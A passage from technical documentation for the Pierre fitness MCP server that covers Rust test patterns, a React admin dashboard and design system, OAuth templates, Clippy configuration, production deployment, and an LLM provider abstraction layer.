let entries = fs::read_dir(¤t_dir)?;
for entry in entries {
let entry = entry?;
let filename = entry.file_name();
let filename_str = filename.to_string_lossy();
assert!(
!filename_str.starts_with(":memory:test_"),
"Found physical file that should be in-memory: {filename_str}"
);
}
// Test basic database functionality
let user = User::new(
"test@memory.test".to_owned(),
"password_hash".to_owned(),
Some("Memory Test User".to_owned()),
);
let user_id = database.create_user(&user).await?;
let retrieved_user = database.get_user(user_id).await?.unwrap();
assert_eq!(retrieved_user.email, "test@memory.test");
assert_eq!(retrieved_user.display_name, Some("Memory Test User".to_owned()));
Ok(())
}
}
Benefits:
- Fast: No disk I/O, tests run in milliseconds
- Isolated: Each test gets independent database
- No cleanup: Memory automatically freed after test
- Deterministic: No race conditions from shared state
Database Isolation Testing
Source: tests/database_memory_test.rs:74-126
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_multiple_memory_databases_isolated() -> Result<()> {
let encryption_key1 = generate_encryption_key().to_vec();
let encryption_key2 = generate_encryption_key().to_vec();
// Create two separate in-memory databases
let database1 = Database::new("sqlite::memory:", encryption_key1).await?;
let database2 = Database::new("sqlite::memory:", encryption_key2).await?;
// Create users in each database
let user1 = User::new(
"user1@test.com".to_owned(),
"hash1".to_owned(),
Some("User 1".to_owned()),
);
let user2 = User::new(
"user2@test.com".to_owned(),
"hash2".to_owned(),
Some("User 2".to_owned()),
);
let user1_id = database1.create_user(&user1).await?;
let user2_id = database2.create_user(&user2).await?;
// Verify isolation - each database only contains its own user
assert!(database1.get_user(user1_id).await?.is_some());
assert!(database2.get_user(user2_id).await?.is_some());
// User1 should not exist in database2 and vice versa
assert!(database2.get_user(user1_id).await?.is_none());
assert!(database1.get_user(user2_id).await?.is_none());
Ok(())
}
}
Why isolation matters: Tests can run in parallel without interfering. Each test gets clean database state.
Test Fixture Helpers
Common test fixtures (tests/common.rs - conceptual):
#![allow(unused)]
fn main() {
/// Create test database with migrations applied
pub async fn create_test_database() -> Result<Arc<Database>> {
let encryption_key = generate_encryption_key().to_vec();
let database = Database::new("sqlite::memory:", encryption_key).await?;
database.migrate().await?;
Ok(Arc::new(database))
}
/// Create test auth manager with default config
pub fn create_test_auth_manager() -> Arc<AuthManager> {
Arc::new(AuthManager::new())
}
/// Create test cache
pub async fn create_test_cache() -> Result<Arc<Cache>> {
Ok(Arc::new(Cache::new()))
}
/// Initialize server config from environment
pub fn init_server_config() {
std::env::set_var("JWT_SECRET", "test_jwt_secret");
std::env::set_var("ENCRYPTION_KEY", "test_encryption_key_32_bytes_long");
}
}
Pattern: Centralized test helpers reduce duplication and ensure consistent test setup.
Integration Testing Patterns
Pierre tests MCP protocol handlers using structured JSON-RPC requests.
MCP Request Helpers
Source: tests/mcp_protocol_comprehensive_test.rs:27-47
#![allow(unused)]
fn main() {
/// Test helper to create MCP request
fn create_mcp_request(method: &str, params: Option<&Value>, id: Option<Value>) -> Value {
json!({
"jsonrpc": "2.0",
"method": method,
"params": params,
"id": id.unwrap_or_else(|| json!(1))
})
}
/// Test helper to create authenticated MCP request
fn create_auth_mcp_request(
method: &str,
params: Option<&Value>,
token: &str,
id: Option<Value>,
) -> Value {
let mut request = create_mcp_request(method, params, id);
request["auth_token"] = json!(token);
request
}
}
MCP Protocol Integration Test
Source: tests/mcp_protocol_comprehensive_test.rs:49-77
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_mcp_initialize_request() -> Result<()> {
common::init_server_config();
let database = common::create_test_database().await?;
let auth_manager = common::create_test_auth_manager();
let config = Arc::new(ServerConfig::from_env()?);
let cache = common::create_test_cache().await.unwrap();
let resources = Arc::new(ServerResources::new(
(*database).clone(),
(*auth_manager).clone(),
TEST_JWT_SECRET,
config,
cache,
2048, // Use 2048-bit RSA keys for faster test execution
Some(common::get_shared_test_jwks()),
));
let server = MultiTenantMcpServer::new(resources);
// Test initialize request
let _request = create_mcp_request("initialize", None, Some(json!("init-1")));
// Validate server is properly initialized
let _ = server.database();
Ok(())
}
}
Pattern: Integration tests validate component interactions (server → database → auth) without mocking.
Authentication Testing
Source: tests/mcp_protocol_comprehensive_test.rs:137-175
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_mcp_authenticate_request() -> Result<()> {
common::init_server_config();
let database = common::create_test_database().await?;
let auth_manager = common::create_test_auth_manager();
let config = Arc::new(ServerConfig::from_env()?);
let cache = common::create_test_cache().await.unwrap();
let resources = Arc::new(ServerResources::new(
(*database).clone(),
(*auth_manager).clone(),
TEST_JWT_SECRET,
config,
cache,
2048,
Some(common::get_shared_test_jwks()),
));
let _server = MultiTenantMcpServer::new(resources);
// Create test user
let user = User::new(
"mcp_auth@example.com".to_owned(),
"password123".to_owned(),
Some("MCP Auth Test".to_owned()),
);
database.create_user(&user).await?;
// Test authenticate request format
let auth_params = json!({
"email": "mcp_auth@example.com",
"password": "password123"
});
let request = create_mcp_request("authenticate", Some(&auth_params), Some(json!("auth-1")));
assert_eq!(request["method"], "authenticate");
assert_eq!(request["params"]["email"], "mcp_auth@example.com");
Ok(())
}
}
Pattern: Create test user → Construct auth request → Validate request structure.
Async Testing Patterns
Pierre uses #[tokio::test] for async test execution.
Async Test Basics
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_async_database_operation() -> Result<()> {
let database = create_test_database().await?;
// Async operations work naturally
let user = User::new("test@example.com".to_owned(), "hash".to_owned(), None);
let user_id = database.create_user(&user).await?;
// Multiple awaits in sequence
let retrieved = database.get_user(user_id).await?;
assert!(retrieved.is_some());
Ok(())
}
}
tokio::test features:
- Multi-threaded runtime: Tests run on tokio runtime
- Async/await support: Natural async syntax
- Automatic cleanup: Runtime shut down after test
- Error propagation:
Result<()>with?operator
Concurrent Async Operations
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_concurrent_database_writes() -> Result<()> {
let database = create_test_database().await?;
// Spawn multiple concurrent tasks
let handles: Vec<_> = (0..10)
.map(|i| {
let db = database.clone();
tokio::spawn(async move {
let user = User::new(
format!("user{}@test.com", i),
"hash".to_owned(),
None,
);
db.create_user(&user).await
})
})
.collect();
// Wait for all tasks to complete
for handle in handles {
handle.await??;
}
Ok(())
}
}
Pattern: Test concurrent behavior with tokio::spawn to validate thread safety.
Synthetic Data Generation
Pierre uses deterministic synthetic data for reproducible tests (covered in Chapter 14).
Key benefits:
- No OAuth required: Tests run without external API dependencies
- Deterministic: Seeded RNG ensures same data every run
- Realistic: Physiologically plausible activity data
- Fast: In-memory synthetic provider, no network calls
Usage example (tests/intelligence_synthetic_helpers_test.rs):
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_beginner_progression_algorithm() {
let mut builder = SyntheticDataBuilder::new(42); // Deterministic seed
let activities = builder.generate_pattern(TrainingPattern::BeginnerRunnerImproving);
let provider = SyntheticProvider::with_activities(activities);
// Test intelligence algorithms without OAuth
let trends = analyze_performance_trends(&provider).await?;
assert!(trends.pace_improvement > 0.30); // Expect 35% improvement
}
}
Test Helpers and Scenario Builders
Pierre provides reusable test helpers for common testing patterns.
Scenario-Based Testing
Source: tests/helpers/test_utils.rs:9-33
#![allow(unused)]
fn main() {
/// Test scenarios for intelligence testing
#[derive(Debug, Clone, Copy)]
pub enum TestScenario {
/// Beginner runner showing 35% improvement over 6 weeks
BeginnerRunnerImproving,
/// Experienced cyclist with stable, consistent performance
ExperiencedCyclistConsistent,
/// Athlete showing signs of overtraining (TSB < -30)
OvertrainingRisk,
/// Return from injury with gradual progression
InjuryRecovery,
}
impl TestScenario {
/// Get the corresponding pattern from synthetic data builder
#[must_use]
pub const fn to_training_pattern(self) -> TrainingPattern {
match self {
Self::BeginnerRunnerImproving => TrainingPattern::BeginnerRunnerImproving,
Self::ExperiencedCyclistConsistent => TrainingPattern::ExperiencedCyclistConsistent,
Self::OvertrainingRisk => TrainingPattern::Overtraining,
Self::InjuryRecovery => TrainingPattern::InjuryRecovery,
}
}
}
}
Scenario Provider Creation
Source: tests/helpers/test_utils.rs:35-42
#![allow(unused)]
fn main() {
/// Create a synthetic provider with pre-configured scenario data
#[must_use]
pub fn create_synthetic_provider_with_scenario(scenario: TestScenario) -> SyntheticProvider {
let mut builder = SyntheticDataBuilder::new(42); // Deterministic seed
let activities = builder.generate_pattern(scenario.to_training_pattern());
SyntheticProvider::with_activities(activities)
}
}
Usage:
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_overtraining_detection() -> Result<()> {
let provider = create_synthetic_provider_with_scenario(TestScenario::OvertrainingRisk);
let recovery = calculate_recovery_score(&provider).await?;
assert!(recovery.tsb < -30.0); // Overtraining threshold
Ok(())
}
}
Benefits:
- Readable tests:
TestScenario::BeginnerRunnerImprovingvs raw data construction - Reusable: Same scenarios across multiple test files
- Maintainable: Change scenario in one place, all tests update
Error Testing Patterns
Test error conditions explicitly to validate error handling.
Testing Error Cases
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_duplicate_user_email_rejected() -> Result<()> {
let database = create_test_database().await?;
let user1 = User::new("duplicate@test.com".to_owned(), "hash1".to_owned(), None);
let user2 = User::new("duplicate@test.com".to_owned(), "hash2".to_owned(), None);
// First user succeeds
database.create_user(&user1).await?;
// Second user with same email fails
let result = database.create_user(&user2).await;
assert!(result.is_err());
// Verify error type
let err = result.unwrap_err();
assert!(err.to_string().contains("UNIQUE constraint"));
Ok(())
}
}
Testing Validation Errors
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_invalid_email_rejected() -> Result<()> {
use pierre_mcp_server::database_plugins::shared::validation::validate_email;
// Test various invalid email formats
let invalid_emails = vec![
"notanemail",
"@test.com",
"test@",
"a@b",
"",
];
for email in invalid_emails {
let result = validate_email(email);
assert!(result.is_err(), "Email '{}' should be invalid", email);
}
// Valid email passes
assert!(validate_email("valid@example.com").is_ok());
Ok(())
}
}
Pattern: Test both success path AND failure paths to ensure error handling works.
Test Organization
Pierre organizes tests by scope and type with 1,635 lines of test helper code.
Test directory structure:
tests/
├── helpers/ # 1,635 lines of shared test utilities
│ ├── synthetic_data.rs # Deterministic test data generation
│ ├── synthetic_provider.rs # In-memory provider for testing
│ └── test_utils.rs # Scenario builders and assertions
├── database_memory_test.rs # Database isolation tests
├── mcp_protocol_comprehensive_test.rs # MCP integration tests
├── admin_jwt_test.rs # JWT authentication tests
├── oauth_e2e_test.rs # OAuth flow E2E tests
├── intelligence_recovery_calculator_test.rs # Algorithm tests
├── pagination_test.rs # Pagination logic tests
├── configuration_profiles_test.rs # Config validation tests
└── [40+ additional test files]
Test categories:
- Database tests: In-memory isolation, transaction handling, migration validation
- Integration tests: MCP protocol, OAuth flows, provider interactions
- Algorithm tests: Recovery calculations, nutrition calculations, performance analysis
- E2E tests: Full user workflows from authentication to data retrieval
- Unit tests: Validation functions, enum conversions, mappers
Key Test Patterns
Pattern 1: Builder for test data
#![allow(unused)]
fn main() {
let activity = ActivityBuilder::new(SportType::Run)
.distance_km(10.0)
.duration_minutes(50)
.average_hr(150)
.build();
}
Pattern 2: Seeded RNG for determinism
#![allow(unused)]
fn main() {
let mut builder = SyntheticDataBuilder::new(42); // Same seed = same data
}
Pattern 3: Synthetic provider for isolation
#![allow(unused)]
fn main() {
let provider = SyntheticProvider::with_activities(vec![activity1, activity2]);
let result = service.analyze(&provider).await?;
}
Key Takeaways
-
In-memory databases:
sqlite::memory:provides fast, isolated tests without physical files or cleanup overhead. -
Database isolation: Each test gets independent database instance, enabling safe parallel test execution.
-
Test fixtures: Centralized helpers like
create_test_database()ensure consistent test setup across all tests. -
Integration testing: MCP protocol tests validate component interactions (server → database → auth) without mocking.
-
JSON-RPC helpers:
create_mcp_request()andcreate_auth_mcp_request()simplify MCP protocol testing. -
Async testing:
#[tokio::test]provides multi-threaded async runtime for natural async/await syntax in tests. -
Concurrent testing:
tokio::spawnvalidates thread safety by testing concurrent database writes and reads. -
Scenario-based testing:
TestScenarioenum provides readable, reusable test scenarios (BeginnerRunnerImproving, OvertrainingRisk). -
Synthetic data: Deterministic test data with seeded RNG (
SyntheticDataBuilder::new(42)) ensures reproducible tests without OAuth. -
Error testing: Explicitly test failure paths (duplicate emails, invalid data) to validate error handling works.
-
Test organization: 1,635 lines of helper code in
tests/helpers/plus 40+ test files organized by category. -
Builder pattern: Fluent API for constructing test activities and data structures.
-
Validation testing: Test shared validation functions (
validate_email,validate_tenant_ownership) with multiple invalid inputs. -
No external dependencies: Tests run offline using in-memory databases and synthetic providers.
-
Fast execution: In-memory databases + synthetic data = millisecond test times, enabling rapid development feedback.
Next Chapter: Chapter 24: Design System - Learn about Pierre’s design system, templates, frontend architecture, and user experience patterns.
Chapter 24: Design System - Frontend Dashboard, Templates & UX
This chapter covers Pierre’s design system including the React admin dashboard, OAuth templates, brand identity, and user experience patterns for fitness data visualization.
Frontend Admin Dashboard
Pierre includes a full-featured React admin dashboard for server management.
Technology stack:
- React 19 with TypeScript
- TailwindCSS for styling
- React Query for data fetching/caching
- Chart.js for analytics visualization
- WebSocket for real-time updates
- Vite for development/building
frontend/
├── src/
│ ├── App.tsx # Main application
│ ├── services/api.ts # Axios API client
│ ├── contexts/ # React contexts
│ │ ├── AuthContext.tsx # Auth state
│ │ └── WebSocketProvider.tsx # Real-time updates
│ ├── hooks/ # Custom hooks
│ │ ├── useAuth.ts # Auth hook
│ │ └── useWebSocket.ts # WebSocket hook
│ └── components/ # UI components (20+)
│ ├── Dashboard.tsx # Main dashboard
│ ├── UserManagement.tsx
│ ├── A2AManagement.tsx
│ └── ...
├── tailwind.config.js # Brand colors
└── BRAND.md # Design system docs
Dashboard Architecture
The dashboard uses lazy loading for performance optimization:
Source: frontend/src/components/Dashboard.tsx:12-18
// Lazy load heavy components to reduce initial bundle size
const OverviewTab = lazy(() => import('./OverviewTab'));
const UsageAnalytics = lazy(() => import('./UsageAnalytics'));
const RequestMonitor = lazy(() => import('./RequestMonitor'));
const ToolUsageBreakdown = lazy(() => import('./ToolUsageBreakdown'));
const UnifiedConnections = lazy(() => import('./UnifiedConnections'));
const UserManagement = lazy(() => import('./UserManagement'));
Dashboard tabs:
- Overview: System metrics, API key usage, health status
- Analytics: Request patterns, tool usage breakdown, trends
- Connections: Provider OAuth status, user connections
- Users: User approval, tenant management (admin only)
- A2A: Agent-to-Agent monitoring, client registration
API Service Layer
The API service handles CSRF protection and auth token management:
Source: frontend/src/services/api.ts:7-33
class ApiService {
private csrfToken: string | null = null;
constructor() {
axios.defaults.baseURL = API_BASE_URL;
axios.defaults.withCredentials = true;
this.setupInterceptors();
}
private setupInterceptors() {
// Add CSRF token for state-changing operations
axios.interceptors.request.use((config) => {
if (this.csrfToken && ['POST', 'PUT', 'DELETE'].includes(config.method?.toUpperCase() || '')) {
config.headers['X-CSRF-Token'] = this.csrfToken;
}
return config;
});
// Handle 401 errors (trigger logout)
axios.interceptors.response.use(
(response) => response,
(error) => {
if (error.response?.status === 401) {
this.handleAuthFailure();
}
return Promise.reject(error);
}
);
}
}
Real-Time Updates (WebSocket)
The dashboard receives live updates via WebSocket:
Source: frontend/src/components/Dashboard.tsx:76-80
// Refresh data when WebSocket updates are received
useEffect(() => {
if (lastMessage) {
if (lastMessage.type === 'usage_update' || lastMessage.type === 'system_stats') {
refetchOverview();
}
}
}, [lastMessage, refetchOverview]);
WebSocket message types:
usage_update: API usage metrics changedsystem_stats: System health metrics updatedconnection_status: Provider connection changeduser_approved: User approval status changed
Brand Identity
Pierre uses a “Three Pillars” design system representing holistic fitness:
Source: frontend/BRAND.md:15-20
| Pillar | Color | Hex | Usage |
|------------|---------|-----------|------------------------------|
| Activity | Emerald | #10B981 | Movement, fitness, energy |
| Nutrition | Amber | #F59E0B | Food, fuel, nourishment |
| Recovery | Indigo | #6366F1 | Rest, sleep, restoration |
Primary brand colors:
- Pierre Violet (
#7C3AED): Intelligence, AI, sophistication - Pierre Cyan (
#06B6D4): Data flow, connectivity, freshness
TailwindCSS classes:
<!-- Primary colors -->
<div class="bg-pierre-violet">Intelligence</div>
<div class="bg-pierre-cyan">Data Flow</div>
<!-- Three Pillars -->
<Badge class="bg-pierre-activity">Running</Badge>
<Badge class="bg-pierre-nutrition">Calories</Badge>
<Badge class="bg-pierre-recovery">Sleep</Badge>
OAuth Templates
Pierre uses HTML templates for OAuth callback pages.
OAuth success template (templates/oauth_success.html):
<!DOCTYPE html>
<html>
<head>
<title>OAuth Success - Pierre Fitness</title>
<style>
body {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
}
.container {
background: white;
padding: 40px;
border-radius: 12px;
box-shadow: 0 10px 40px rgba(0,0,0,0.2);
text-align: center;
}
h1 { color: #667eea; }
.success-icon { font-size: 64px; color: #10b981; }
</style>
</head>
<body>
<div class="container">
<div class="success-icon">✓</div>
<h1>Successfully Connected to {{PROVIDER}}</h1>
<p>You can now close this window and return to the app.</p>
<p>User ID: {{USER_ID}}</p>
</div>
</body>
</html>
Template rendering:
Source: src/oauth2_client/flow_manager.rs:11-26
#![allow(unused)]
fn main() {
pub struct OAuthTemplateRenderer;
impl OAuthTemplateRenderer {
pub fn render_success_template(
provider: &str,
callback_response: &OAuthCallbackResponse,
) -> Result<String, Box<dyn std::error::Error>> {
const TEMPLATE: &str = include_str!("../../templates/oauth_success.html");
let rendered = TEMPLATE
.replace("{{PROVIDER}}", provider)
.replace("{{USER_ID}}", &callback_response.user_id);
Ok(rendered)
}
}
}
Dashboard Components
Overview Tab
Displays system health, API key statistics, and quick metrics.
Usage Analytics
Chart.js visualizations for request patterns over time.
Request Monitor
Real-time feed of API requests with filtering and search.
Tool Usage Breakdown
Pie charts and tables showing which MCP tools are most used.
User Management (Admin)
- Approve/reject pending user registrations
- View user activity and connections
- Manage tenant assignments
A2A Management
- Register new A2A clients
- Monitor agent-to-agent communications
- View capability discovery logs
Development Setup
# Install dependencies
cd frontend
npm install
# Start development server (with Vite proxy to backend)
npm run dev
# Build for production
npm run build
# Run tests
npm test
# Type checking
npm run type-check
Vite proxy configuration (vite.config.ts):
export default defineConfig({
server: {
proxy: {
'/api': 'http://localhost:8081',
'/ws': {
target: 'ws://localhost:8081',
ws: true,
},
},
},
});
Key Takeaways
- React admin dashboard: Full-featured dashboard with 20+ components for server management.
- Lazy loading: Heavy components loaded on-demand for fast initial page load.
- React Query: Server state management with automatic caching and refetching.
- WebSocket: Real-time updates for live metrics and status changes.
- Three Pillars: Activity (emerald), Nutrition (amber), Recovery (indigo) color system.
- OAuth templates: HTML templates with
{{PLACEHOLDER}}substitution for success/error pages. - CSRF protection: API service automatically adds CSRF tokens to state-changing requests.
- TailwindCSS: Brand colors available as
pierre-*utility classes.
Next Chapter: Chapter 25: Production Deployment, Clippy & Performance - Learn about production deployment strategies, Clippy lint configuration, performance optimization, and monitoring.
Chapter 25: Production Deployment, Clippy & Performance
This chapter covers production deployment strategies, Clippy lint configuration for code quality, performance optimization techniques, and monitoring best practices for Pierre.
Clippy Configuration
Pierre uses strict Clippy lints to maintain code quality with zero tolerance (deny level) for most warnings.
Source: Cargo.toml (lints section)
[lints.rust]
# STRICT UNSAFE CODE POLICY: Zero tolerance
unsafe_code = "deny"
missing_docs = "warn"
[lints.clippy]
# Base configuration: Enable all clippy lint groups at DENY level
# Priority -1 ensures these are applied first, then specific overrides below
all = { level = "deny", priority = -1 }
pedantic = { level = "deny", priority = -1 }
nursery = { level = "deny", priority = -1 }
# Critical Denials - Error Handling Anti-Patterns
unwrap_used = "deny"
expect_used = "deny"
panic = "deny"
# Allowed Exceptions (type casts with proper validation)
cast_possible_truncation = "allow"
cast_sign_loss = "allow"
cast_precision_loss = "allow"
# Const fn suggestions - false positives with runtime methods
missing_const_for_fn = "allow"
# Structural patterns - validated separately
struct_excessive_bools = "allow"
too_many_lines = "allow"
significant_drop_tightening = "allow"
# Additional code quality lints
clone_on_copy = "warn"
redundant_clone = "warn"
Lint configuration syntax (TOML inline tables):
{ level = "deny", priority = -1 }- Table syntax with priority ordering- Priority
-1means these base rules apply first, allowing specific overrides - Simple values like
"deny"or"allow"work for single-priority lints
Lint categories:
- all: Enable all Clippy lints (deny level = build errors)
- pedantic: Extra pedantic lints for code quality
- nursery: Experimental lints being tested
- Denials:
unwrap_used,paniccause build failures
Why deny unwrap/expect: Prevents runtime panics in production. Use ? operator, .unwrap_or(), or proper error handling instead.
Why deny unsafe: Pierre has a zero-unsafe policy with only one approved exception (src/health.rs for Windows FFI).
Production Deployment
Pierre deployment architecture:
┌──────────────┐
│ Nginx │ (Reverse proxy, TLS termination)
└──────┬───────┘
│
┌──────▼───────┐
│ Pierre │ (Rust binary, multiple instances)
│ Server │
└──────┬───────┘
│
┌──────▼───────┐
│ PostgreSQL │ (Primary database)
└──────────────┘
Deployment checklist:
- Environment variables: Set
DATABASE_URL,JWT_SECRET,OAUTH_*vars - TLS certificates: Configure HTTPS with Let’s Encrypt
- Database migrations: Run
sqlx migrate run - Connection pooling: Set
DATABASE_MAX_CONNECTIONS=20 - Logging: Configure
RUST_LOG=info - Monitoring: Enable Prometheus metrics endpoint
Performance Optimization
Database connection pooling:
#![allow(unused)]
fn main() {
let pool = PgPoolOptions::new()
.max_connections(20)
.acquire_timeout(Duration::from_secs(3))
.connect(&database_url)
.await?;
}
Query optimization:
- Indexes: Create indexes on
user_id,provider,activity_date - Prepared statements: Use SQLx compile-time verification
- Batch operations: Insert multiple activities in single transaction
- Connection reuse: Pool connections, avoid per-request connections
Async runtime optimization:
[dependencies]
tokio = { version = "1", features = ["full"] }
Tokio configuration:
- Worker threads: Default = CPU cores
- Blocking threads: Separate pool for blocking operations
- Stack size: Increase if deep recursion needed
Monitoring
Metrics to track:
- Request latency: P50, P95, P99 response times
- Error rate: 4xx and 5xx responses per endpoint
- Database connections: Active, idle, waiting
- Memory usage: RSS, heap allocation
- OAuth success rate: Connection success vs failures
Logging best practices:
#![allow(unused)]
fn main() {
tracing::info!(
user_id = %user_id,
provider = %provider,
activities_count = activities.len(),
"Successfully fetched activities"
);
}
Security Hardening
Production security:
- TLS only: Redirect HTTP to HTTPS
- CORS restrictions: Whitelist allowed origins
- Rate limiting: IP-based limits for public endpoints
- Input validation: Validate all user inputs
- SQL injection prevention: Use parameterized queries (SQLx)
- Secret management: Use environment variables or vault
- Audit logging: Log all authentication attempts
Environment configuration:
# Production environment variables
export DATABASE_URL="postgresql://user:pass@localhost/pierre"
export JWT_SECRET="$(openssl rand -base64 32)"
export RUST_LOG="info"
export HTTP_PORT="8081"
export CORS_ALLOWED_ORIGINS="https://app.pierre.ai"
Scaling Strategies
Horizontal scaling:
- Load balancer: Nginx/HAProxy distributes requests
- Multiple instances: Run 2-4 Pierre servers behind load balancer
- Session affinity: Not required (stateless JWT authentication)
Database scaling:
- Read replicas: Offload read-heavy queries
- Connection pooling: Limit connections per instance
- Caching: Redis for frequently accessed data
Performance targets:
- API latency: P95 < 200ms
- Database queries: P95 < 50ms
- OAuth flow: Complete in < 5 seconds
- Throughput: 1000 req/sec per instance
Key Takeaways
- Clippy lints: Strict lints (
denyunwrap, panic, todo) prevent common errors. - Connection pooling: Reuse database connections for performance.
- Deployment architecture: Nginx → Pierre (multiple instances) → PostgreSQL.
- Monitoring: Track latency, errors, connections, memory.
- Security hardening: TLS, CORS, rate limiting, input validation.
- Horizontal scaling: Load balancer + multiple stateless instances.
- Environment config: Use env vars for secrets and configuration.
End of Part VII: Testing & Deployment
You’ve completed the testing and deployment section. You now understand:
- Testing framework with synthetic data (Chapter 23)
- Design system and templates (Chapter 24)
- Production deployment and performance (Chapter 25)
Next: Appendix A: Rust Idioms Reference - Quick reference for Rust idioms used throughout Pierre.
Chapter 26: LLM Provider Architecture
This chapter explores Pierre’s LLM (Large Language Model) provider abstraction layer, which enables pluggable AI model integration for chat functionality and recipe generation. The architecture mirrors the fitness provider SPI pattern, providing a consistent approach to external service integration.
Architecture Overview
The LLM module uses a runtime provider selector pattern. The ChatProvider enum wraps the underlying providers and selects based on the PIERRE_LLM_PROVIDER environment variable.
┌──────────────────────────────────────────────────────────────────────────────────────┐
│ Chat System │
│ ┌──────────────────────────────────────────────────────────────────────────────┐ │
│ │ ChatProvider │ │
│ │ Runtime selector: PIERRE_LLM_PROVIDER=groq|gemini|local|ollama|vllm │ │
│ └───────────────────────────────┬──────────────────────────────────────────────┘ │
│ │ │
│ ┌────────────────────────┼────────────────────────┐ │
│ │ │ │ │
│ ▼ ▼ ▼ │
│ ┌─────────────┐ ┌─────────────┐ ┌─────────────┐ │
│ │ Gemini │ │ Groq │ │ Local │ │
│ │ Provider │ │ Provider │ │ Provider │ │
│ │ (vision, │ │ (fast LPU │ │ (Ollama, │ │
│ │ tools) │ │ inference) │ │ vLLM, etc) │ │
│ └──────┬──────┘ └──────┬──────┘ └──────┬──────┘ │
│ │ │ │ │
│ └────────────────────────┼────────────────────────┘ │
│ │ │
│ ▼ │
│ ┌───────────────────────────────┐ │
│ │ LlmProvider Trait │ │
│ │ ┌─────────────────────────┐ │ │
│ │ │ + name() │ │ │
│ │ │ + capabilities() │ │ │
│ │ │ + complete() │ │ │
│ │ │ + complete_stream() │ │ │
│ │ │ + health_check() │ │ │
│ │ └─────────────────────────┘ │ │
│ └───────────────────────────────┘ │
└──────────────────────────────────────────────────────────────────────────────────────┘
Module Structure
src/llm/
├── mod.rs # Trait definitions, types, registry, exports
├── provider.rs # ChatProvider enum (runtime selector)
├── gemini.rs # Google Gemini implementation
├── groq.rs # Groq LPU implementation
├── openai_compatible.rs # OpenAI-compatible API (Ollama, vLLM, LocalAI)
└── prompts/
└── mod.rs # System prompts (pierre_system.md)
Source: src/lib.rs
#![allow(unused)]
fn main() {
/// LLM provider abstraction for AI chat integration
pub mod llm;
}
Configuration
Environment Variables
| Variable | Description | Default |
|---|---|---|
PIERRE_LLM_PROVIDER | Provider selector: groq, gemini, local, ollama, vllm, localai | groq |
GROQ_API_KEY | Groq API key | Required for Groq |
GEMINI_API_KEY | Google Gemini API key | Required for Gemini |
LOCAL_LLM_BASE_URL | Base URL for OpenAI-compatible API | http://localhost:11434/v1 (Ollama) |
LOCAL_LLM_MODEL | Model name for local provider | qwen2.5:14b-instruct |
LOCAL_LLM_API_KEY | API key (optional for local servers) | None |
Provider Comparison
| Feature | Groq | Gemini | Local (OpenAI-compatible) |
|---|---|---|---|
| Default | ✓ | ||
| Streaming | ✓ | ✓ | ✓ |
| Function Calling | ✓ | ✓ | ✓ (model dependent) |
| Vision | ✗ | ✓ | Model dependent |
| JSON Mode | ✓ | ✓ | ✓ |
| System Messages | ✓ | ✓ | ✓ |
| Rate Limits | 12K TPM (free) | More generous | None (local) |
| Speed | Very fast (LPU) | Fast | Hardware dependent |
| Privacy | Cloud | Cloud | Local/Private |
| Cost | Free tier | Paid | Free (local hardware) |
Local Provider Backends
The Local provider supports any OpenAI-compatible API:
| Backend | Default URL | Notes |
|---|---|---|
| Ollama | http://localhost:11434/v1 | Default, easy setup |
| vLLM | http://localhost:8000/v1 | High-throughput serving |
| LocalAI | http://localhost:8080/v1 | Lightweight alternative |
| Text Generation Inference | http://localhost:8080/v1 | Hugging Face optimized |
Capability Detection with Bitflags
LLM providers have varying capabilities. We use bitflags for efficient storage and querying:
Source: src/llm/mod.rs
#![allow(unused)]
fn main() {
bitflags::bitflags! {
/// LLM provider capability flags using bitflags for efficient storage
#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct LlmCapabilities: u8 {
/// Provider supports streaming responses
const STREAMING = 0b0000_0001;
/// Provider supports function/tool calling
const FUNCTION_CALLING = 0b0000_0010;
/// Provider supports vision/image input
const VISION = 0b0000_0100;
/// Provider supports JSON mode output
const JSON_MODE = 0b0000_1000;
/// Provider supports system messages
const SYSTEM_MESSAGES = 0b0001_0000;
}
}
}
Helper methods:
#![allow(unused)]
fn main() {
impl LlmCapabilities {
/// Create capabilities for a basic text-only provider
pub const fn text_only() -> Self {
Self::STREAMING.union(Self::SYSTEM_MESSAGES)
}
/// Create capabilities for a full-featured provider
pub const fn full_featured() -> Self {
Self::STREAMING
.union(Self::FUNCTION_CALLING)
.union(Self::VISION)
.union(Self::JSON_MODE)
.union(Self::SYSTEM_MESSAGES)
}
/// Check if streaming is supported
pub const fn supports_streaming(&self) -> bool {
self.contains(Self::STREAMING)
}
}
}
Usage:
#![allow(unused)]
fn main() {
let caps = provider.capabilities();
if caps.supports_streaming() && caps.supports_function_calling() {
// Use advanced features
} else if caps.supports_streaming() {
// Use basic streaming
}
}
The LlmProvider Trait
The core abstraction that all providers implement:
Source: src/llm/mod.rs
#![allow(unused)]
fn main() {
/// Type alias for boxed stream of chat chunks
pub type ChatStream = Pin<Box<dyn Stream<Item = Result<StreamChunk, AppError>> + Send>>;
#[async_trait]
pub trait LlmProvider: Send + Sync {
/// Unique provider identifier (e.g., "gemini", "groq")
fn name(&self) -> &'static str;
/// Human-readable display name for the provider
fn display_name(&self) -> &'static str;
/// Provider capabilities (streaming, function calling, etc.)
fn capabilities(&self) -> LlmCapabilities;
/// Default model to use if not specified in request
fn default_model(&self) -> &'static str;
/// Available models for this provider
fn available_models(&self) -> &'static [&'static str];
/// Perform a chat completion (non-streaming)
async fn complete(&self, request: &ChatRequest) -> Result<ChatResponse, AppError>;
/// Perform a streaming chat completion
async fn complete_stream(&self, request: &ChatRequest) -> Result<ChatStream, AppError>;
/// Check if the provider is healthy and API key is valid
async fn health_check(&self) -> Result<bool, AppError>;
}
}
ChatProvider: Runtime Selection
The ChatProvider enum provides runtime provider selection based on environment configuration:
Source: src/llm/provider.rs
#![allow(unused)]
fn main() {
/// Unified chat provider that wraps Gemini, Groq, or Local providers
pub enum ChatProvider {
